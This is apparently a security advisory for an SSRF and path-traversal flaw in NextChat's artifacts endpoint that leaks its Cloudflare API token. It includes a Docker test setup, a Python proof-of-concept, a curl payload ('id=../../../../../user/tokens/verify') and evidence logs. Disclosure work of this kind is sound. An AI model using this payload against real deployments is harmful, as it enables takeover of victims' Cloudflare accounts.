### Vulnerability Overview **Title**: Server-Side Request Forgery (SSRF) and Cloudflare API Token Leakage via Path Traversal in Artifacts Endpoint **Description**: - **Vulnerability Type**: SSRF and Cloudflare API Token Leakage - **Affected Component**: NextChat Next.js `app/api/artifacts/route.ts` API endpoint - **Vulnerability Principle**: The application fails to validate the user-supplied `id` query parameter, directly concatenating it into the URL for the backend Cloudflare KV API. Attackers can bypass KV namespace restrictions using path traversal (e.g., `../../`) to access arbitrary endpoints of the Cloudflare API. Since the server automatically attaches the high-privilege `CLOUDFLARE_KV_API_KEY` token, attackers can exploit this vulnerability to steal sensitive information. ### Impact Scope - **Affected Products**: - Ecosystem: npm - Package Name: nextchat (Yidadaa/ChatGPT-Next-Web) - Affected Versions: <= v2.16.1 - Fixed Version: Not specified - **Severity**: Critical - **CVSS Vector String**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H ### Remediation - **Remediation Status**: Fixed - **Specific Remediation Measures**: Not detailed, but it is recommended to strictly validate and filter the `id` parameter to prevent path traversal attacks. ### POC Code #### 1. Docker Compose Configuration ```yaml version: '3.9' services: nextchat: image: yidadaa/chatgpt-next-web:latest container_name: nextchat-artifact-ssrf ports: - "3000:3000" environment: - BASE_URL=http://localhost:3000 - CLOUDFLARE_KV_API_KEY=SECRET_TEST_TOKEN - CLOUDFLARE_KV_NAMESPACE_ID=TEST_NAMESPACE - CLOUDFLARE_ACCOUNT_ID=TEST_ACCOUNT ``` #### 2. Start Test Environment ```bash docker compose up -d ``` #### 3. Python POC Script ```python import requests def test_artifact_ssrf(): # Payload path traversal to escape /client/v4/accounts/{accountId}/storage/kv/namespaces/{namespaceId}/ target = "http://localhost:3000/api/artifacts" params = { "id": "../../../../../user/tokens/verify" } try: response = requests.get(target, params=params, timeout=10) print("[*] Artifacts SSRF Response Status:", response.status_code) print("[*] Response body:") print(response.text) if response.status_code in [200, 400, 401, 403]: print("[\n[SUCCESS] Exploit hit Cloudflare traversal target!") else: print("[\n[FAILED] Vulnerability might be patched or endpoint not reachable.") except Exception as e: print("[\n[FAILED] Error during fetching:", str(e)) if __name__ == "__main__": test_artifact_ssrf() ``` #### 4. Run POC ```bash python3 poc.py ``` #### 5. Direct Test Using curl ```bash curl -i -s -k "http://localhost:3000/api/artifacts?id=../../../../../user/tokens/verify" ``` ### Evidence Logs ```plaintext [*] Artifacts SSRF Response Status: 400 [*] Response body: {"success":false,"errors":[{"code":6003,"message":"Invalid request headers","error_chain":[{"code":6111,"mes [SUCCESS] Exploit hit Cloudflare traversal target! ``` ### Impact - **Critical SSRF and Identity Takeover**: Attackers can directly invoke high-privilege Cloudflare API endpoints using the `CLOUDFLARE_KV_API_KEY` configured by NextChat administrators. Depending on the token's permission scope, this could lead to complete takeover of the victim's Cloudflare infrastructure, manipulation of DNS settings, reading of other namespaces, or bypassing proxy protections. ### Weaknesses - **CWE-918**: Server-Side Request Forgery (SSRF) - **CWE-22**: Improper Limitation of a Pathname to a Restricted Directory (Path Traversal) ### Occurrence - **Link**: [https://github.com/Yidadaa/ChatGPT-Next-Web/blob/main/app/api/artifacts/route.ts](https://github.com/Yidadaa/ChatGPT-Next-Web/blob/main/app/api/artifacts/route.ts) - **Description**: The endpoint directly interpolates the `id` query parameter into the `fetch()` URL without neutralizing path traversal sequences (e.g., `../../`), while simultaneously attaching the high-privilege `storeHeaders()` Bearer token.